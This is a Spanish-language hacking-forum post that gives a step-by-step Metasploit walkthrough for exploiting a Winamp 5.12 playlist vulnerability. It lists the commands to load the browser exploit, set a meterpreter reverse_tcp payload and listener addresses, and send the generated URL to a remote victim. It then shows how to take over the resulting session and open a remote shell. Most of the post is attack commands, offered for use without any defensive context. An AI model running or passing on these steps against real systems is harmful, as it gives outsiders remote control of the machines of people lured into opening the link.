[Metasploit] Vulnerabilidad Winamp 5.12

Iniciado por Mavis, Julio 20, 2011, 01:58:25 AM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Julio 20, 2011, 01:58:25 AM Ultima modificación: Agosto 08, 2014, 08:41:55 PM por Expermicid
Buenas, estuve revisando la lista de exploits para Navegadores (Browser) de Windows.
Cuando me tope con una de Winamp con lo que me decidí a probarla..

Vamos que es así:
Con el siguiente código usamos el Exploit
Código: php
use exploit/windows/browser/winamp_playlist_unc


Seleccionamos nuestro Payload de Reversa
Código: php
set payload windows/meterpreter/reverse_tcp


Acá seteamos nuestra IP localhost
Código: php
set LHOST


Acá la IP del Server (Nuestra IP)
Código: php
set SRVHOST


Con este seleccionamos el PUERTO de escucha
Código: php
set SRVPORT


Finalmente lanzamos el Exploit
Código: php
exploit


Nos generará una URL la cual debemos pasar al REMOTO, al abrirla si tiene Winamp, se le abrirá automáticamente con este y le dará un mensaje acerca de su lista de reproducción.

A nosotros en la Consola nos llegará un mensaje de una sesión del Meterpreter abierta..
Verificamos la sesión con el comando
Código: php
sessions


Viendo que en mi caso hay 1 sesión la llamo con
Código: php
sessions -i 1


Nos llegara el mensaje del meterpreter y con esto ya podríamos llamar la shell remota
Código: php
shell


Hasta aquí llegamos..

Autor: Kodeinfect
Fuente: Foro Portal Hacker